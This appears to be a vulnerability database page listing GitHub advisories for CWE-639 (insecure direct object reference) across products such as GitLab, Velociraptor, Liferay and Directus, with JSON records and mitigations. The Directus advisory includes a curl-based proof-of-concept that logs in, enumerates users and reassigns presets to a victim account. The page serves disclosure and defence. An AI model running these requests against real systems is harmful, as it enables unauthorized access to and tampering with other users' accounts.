Common Weakness Enumeration

CWE-639

Allowed

Authorization Bypass Through User-Controlled Key

Abstraction: Base · Status: Incomplete

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

3234 vulnerabilities reference this CWE, most recent first.

GHSA-39XV-4J8V-HP84

Vulnerability from github – Published: 2024-06-27 15:30 – Updated: 2026-06-03 18:33
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in Talya Informatics Travel APPS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel APPS: before v17.0.68.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-1107"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-27T13:15:54Z",
    "severity": "HIGH"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in Talya Informatics Travel APPS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel APPS: before v17.0.68.",
  "id": "GHSA-39xv-4j8v-hp84",
  "modified": "2026-06-03T18:33:05Z",
  "published": "2024-06-27T15:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1107"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-24-0809"
    },
    {
      "type": "WEB",
      "url": "https://www.usom.gov.tr/bildirim/tr-24-0809"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3C27-7487-M6FW

Vulnerability from github – Published: 2026-02-11 12:30 – Updated: 2026-02-11 12:30
VLAI
Details

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.11 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to view certain pipeline values by querying the API.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14594"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-11T12:16:03Z",
    "severity": "LOW"
  },
  "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.11 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to view certain pipeline values by querying the API.",
  "id": "GHSA-3c27-7487-m6fw",
  "modified": "2026-02-11T12:30:22Z",
  "published": "2026-02-11T12:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14594"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3457591"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/583967"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3C93-G9G6-P5J4

Vulnerability from github – Published: 2026-05-06 03:33 – Updated: 2026-05-11 16:23
VLAI
Summary
Velocidex Velociraptor has an authorization bypass vulnerability
Details

An authorization bypass (CWE-639) in the GetUserRoles gRPC API endpoint in Velocidex Velociraptor below version 0.76.5 allows any authenticated low-privilege user to retrieve the complete ACL policy (roles and permissions) for any user across all organizations by supplying targeted Name and Org parameters via a network request.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "www.velocidex.com/golang/velociraptor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.76.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-7573"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T16:23:57Z",
    "nvd_published_at": "2026-05-06T03:15:59Z",
    "severity": "MODERATE"
  },
  "details": "An authorization bypass (CWE-639) in the GetUserRoles gRPC API endpoint in Velocidex Velociraptor below version 0.76.5 allows any authenticated low-privilege user to retrieve the complete ACL policy (roles and permissions) for any user across all organizations by supplying targeted Name and Org parameters via a network request.",
  "id": "GHSA-3c93-g9g6-p5j4",
  "modified": "2026-05-11T16:23:57Z",
  "published": "2026-05-06T03:33:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7573"
    },
    {
      "type": "WEB",
      "url": "https://docs.velociraptor.app/announcements/advisories/cve-2026-7573"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Velocidex/velociraptor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Velocidex Velociraptor has an authorization bypass vulnerability"
}

GHSA-3C96-JFC7-H3R6

Vulnerability from github – Published: 2023-09-27 15:30 – Updated: 2023-09-27 15:30
VLAI
Details

Sensitive information disclosure due to improper authorization. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-44205"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-27T15:19:39Z",
    "severity": "LOW"
  },
  "details": "Sensitive information disclosure due to improper authorization. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.",
  "id": "GHSA-3c96-jfc7-h3r6",
  "modified": "2023-09-27T15:30:39Z",
  "published": "2023-09-27T15:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44205"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-4321"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3CM9-JRF5-H2CX

Vulnerability from github – Published: 2025-10-13 21:31 – Updated: 2025-10-13 22:45
VLAI
Summary
Liferay Account Admin Web vulnerable to Authorization Bypass Through User-Controlled Key
Details

Insecure Direct Object Reference (IDOR) vulnerability with account addresses in Liferay Portal 7.4.3.4 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote authenticated users to from one account to view addresses from a different account via the _com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId parameter.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay:com.liferay.change.tracking.web"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.120"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62242"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T22:43:21Z",
    "nvd_published_at": "2025-10-13T20:15:34Z",
    "severity": "MODERATE"
  },
  "details": "Insecure Direct Object Reference (IDOR) vulnerability with account addresses in Liferay Portal 7.4.3.4 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote authenticated users to from one account to view addresses from a different account via the _com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId parameter.",
  "id": "GHSA-3cm9-jrf5-h2cx",
  "modified": "2025-10-13T22:45:05Z",
  "published": "2025-10-13T21:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62242"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/dd89fff675f04d146fda38a1bec884cf40d0c756"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/fa356d07ab239e790b7e460d33c25184aef58716"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/liferay/liferay-portal"
    },
    {
      "type": "WEB",
      "url": "https://liferay.atlassian.net/browse/LPE-17932"
    },
    {
      "type": "WEB",
      "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62245"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Liferay Account Admin Web vulnerable to Authorization Bypass Through User-Controlled Key "
}

GHSA-3CMC-GQGQ-XMXQ

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-20 18:31
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quiz And Survey Master: from n/a through <= 10.3.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-25324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T09:16:16Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quiz And Survey Master: from n/a through \u003c= 10.3.4.",
  "id": "GHSA-3cmc-gqgq-xmxq",
  "modified": "2026-02-20T18:31:27Z",
  "published": "2026-02-19T18:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25324"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3CVF-5CHQ-5R99

Vulnerability from github – Published: 2025-11-14 21:30 – Updated: 2025-11-15 00:30
VLAI
Details

When processing API requests, the Alteryx server 2022.1.1.42654 and 2024.1 used MongoDB object IDs to uniquely identify the data being requested by the caller. The Alteryx server did not check whether the authenticated user had permission to access the specified MongoDB object ID. By specifying particlar MongoDB object IDs, callers could obtain records for other users without proper authorization. Records retrievable using this attack included administrative API keys and private studio api keys.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-63291"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-648"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-14T19:16:01Z",
    "severity": "MODERATE"
  },
  "details": "When processing API requests, the Alteryx server 2022.1.1.42654 and 2024.1 used MongoDB object IDs to uniquely identify the data being requested by the caller. The Alteryx server did not check whether the authenticated user had permission to access the specified MongoDB object ID. By specifying particlar MongoDB object IDs, callers could obtain records for other users without proper authorization. Records retrievable using this attack included administrative API keys and private studio api keys.",
  "id": "GHSA-3cvf-5chq-5r99",
  "modified": "2025-11-15T00:30:26Z",
  "published": "2025-11-14T21:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63291"
    },
    {
      "type": "WEB",
      "url": "https://aleksazatezalo.medium.com/alteryx-server-idor-advisory-782e3013ee38"
    },
    {
      "type": "WEB",
      "url": "https://help.alteryx.com/current/en/server/api-overview.html"
    },
    {
      "type": "WEB",
      "url": "https://help.alteryx.com/current/en/server/api-overview/alteryx-server-api-v3/server-api-configuration-and-authorization.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3F35-5JMV-GJVP

Vulnerability from github – Published: 2023-12-21 21:30 – Updated: 2026-04-28 21:33
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings.This issue affects WooCommerce Bookings: from n/a through 1.15.78.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-32747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-21T19:15:08Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings.This issue affects WooCommerce Bookings: from n/a through 1.15.78.",
  "id": "GHSA-3f35-5jmv-gjvp",
  "modified": "2026-04-28T21:33:33Z",
  "published": "2023-12-21T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32747"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/woocommerce-bookings/wordpress-woocommerce-bookings-plugin-1-15-78-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3F52-4448-3P36

Vulnerability from github – Published: 2025-06-20 15:30 – Updated: 2026-04-01 18:35
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in eyecix JobSearch allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JobSearch: from n/a through 2.9.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-49978"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-20T15:15:23Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in eyecix JobSearch allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JobSearch: from n/a through 2.9.0.",
  "id": "GHSA-3f52-4448-3p36",
  "modified": "2026-04-01T18:35:30Z",
  "published": "2025-06-20T15:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49978"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/wp-jobsearch/vulnerability/wordpress-jobsearch-plugin-2-9-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3FFF-GQW3-VJ86

Vulnerability from github – Published: 2024-08-27 19:54 – Updated: 2025-03-20 18:36
VLAI
Summary
Directus has an insecure object reference via PATH presets
Details

Impact

Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the POST /presets request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.

This vulnerability occurs because the application only validates the user parameter in the POST /presets request but not in the PATCH request.

PoC

To exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.

  1. Create a preset for a collection.

Store the preset id, or use it if it already exists from GET /presets. The following example will use the direct_users preset.

TARGET_HOST="http://localhost:8055" ATTACKER_EMAIL="malicious@malicious.com" ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") # Store all user's id curl -s -k "${TARGET_HOST}/users" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data[] | select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"

# Choose the victim user id from the previous request
victim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265"
users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \
  -H 'Content-Type: application/json' \
  -b "${root_dir}/static/attacker_directus_session_token" \
  --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"  | jq -r '.data.id')
  1. Modify the presets via PATCH /presets/{id}.

With the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from GET /users. The following example modifies the title parameter.

curl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \
    -H 'Content-Type: application/json' \
    -b "${root_dir}/static/attacker_directus_session_token" \
    --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

Notes:

Each new preset to a specific collection will have an integer consecutive id independent of the user who created it.

The user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.

The app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.

When the victim visits the views of the modified presets, it will be rendered with the new configuration applied.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.13.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "directus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-6534"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-27T19:54:29Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nDirectus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request. When chained with [CVE-2024-6533](https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw), it could result in account takeover.\n\nThis vulnerability occurs because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request.\n\n### PoC\nTo exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.\n\n1. Create a preset for a collection.\n\nStore the preset id, or use it if it already exists from `GET /presets`. The following example will use the direct_users preset.\n\n```bash\nTARGET_HOST=\"http://localhost:8055\" ATTACKER_EMAIL=\"malicious@malicious.com\" ATTACKER_PASSWORD=\"123456\" root_dir=$(dirname $0) mkdir \"${root_dir}/static\" curl -s -k -o /dev/null -w \"%{http_code}\" -X \u0027POST\u0027 \"${TARGET_HOST}/auth/login\" \\ -c \"${root_dir}/static/attacker_directus_session_token\" \\ -H \u0027Content-Type: application/json\u0027 \\ -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\" attacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") # Store all user\u0027s id curl -s -k \"${TARGET_HOST}/users\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data[] | select(.id != \\\"${attacker_user_id}\\\")\" \u003e \"${root_dir}/static/users.json\"\n\n# Choose the victim user id from the previous request\nvictim_user_id=\"4f079119-2478-48c4-bd3a-30fa80c5f265\"\nusers_preset_id=$(curl -s -k -X \u0027POST\u0027 \"${TARGET_HOST}/presets\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b \"${root_dir}/static/attacker_directus_session_token\" \\\n  --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"{{tittle}}\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"  | jq -r \u0027.data.id\u0027)\n```\n\n2. Modify the presets via `PATCH /presets/{id}`.\n\nWith the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from `GET /users`. The following example modifies the title parameter.\n\n```bash\ncurl -i -s -k -X \u0027PATCH\u0027 \"${TARGET_HOST}/presets/${users_preset_id}\" \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${victim_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"PoC Assign another users presets\\\",\\\"subtitle\\\":\\\"fakeemail@fake.com\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nNotes:\n\nEach new preset to a specific collection will have an integer consecutive id independent of the user who created it.\n\nThe user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.\n\nThe app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.\n\nWhen the victim visits the views of the modified presets, it will be rendered with the new configuration applied.",
  "id": "GHSA-3fff-gqw3-vj86",
  "modified": "2025-03-20T18:36:04Z",
  "published": "2024-08-27T19:54:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534"
    },
    {
      "type": "WEB",
      "url": "https://directus.io"
    },
    {
      "type": "WEB",
      "url": "https://fluidattacks.com/advisories/capaldi"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/directus/directus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Directus has an insecure object reference via PATH presets"
}

Mitigation
Architecture and Design

For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.

Mitigation
Architecture and Design Implementation

Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.

Mitigation
Architecture and Design

Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.

No CAPEC attack patterns related to this CWE.